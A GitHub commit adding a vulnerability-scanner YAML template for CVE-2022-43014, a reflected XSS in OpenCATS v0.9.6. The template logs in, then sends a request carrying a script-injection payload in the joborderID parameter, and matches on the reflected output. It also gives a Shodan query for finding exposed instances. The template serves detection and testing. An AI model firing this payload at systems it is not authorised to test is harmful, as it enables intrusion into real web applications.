Merge pull request #5803 from arafatansari/patch-101

Create CVE-2022-43014.yaml
patch-1
Prince Chaddha 2022-10-25 18:20:17 +05:30 committed by GitHub
commit ddd80aa2b5
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 49 additions and 0 deletions

View File

@ -0,0 +1,49 @@
id: CVE-2022-43014
info:
name: OpenCATS v0.9.6 - Cross Site Scripting
author: arafatansari
severity: medium
description: |
OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the joborderID parameter.
reference:
- https://github.com/hansmach1ne/opencats_zero-days/blob/main/XSS_in_joborderID.md
- https://nvd.nist.gov/vuln/detail/CVE-2022-43014
classification:
cve-id: CVE-2022-43014
metadata:
verified: true
shodan-query: title:"OpenCATS"
tags: cve,cve2022,xss,opencats,authenticated
requests:
- raw:
- |
POST /index.php?m=login&a=attemptLogin HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{username}}&password={{password}}
- |
GET /ajax.php?f=getPipelineJobOrder&joborderID=1)"></a>%20<script>alert(document.domain)</script>&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0 HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<script>alert(document.domain)</script>'
- 'CATS='
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200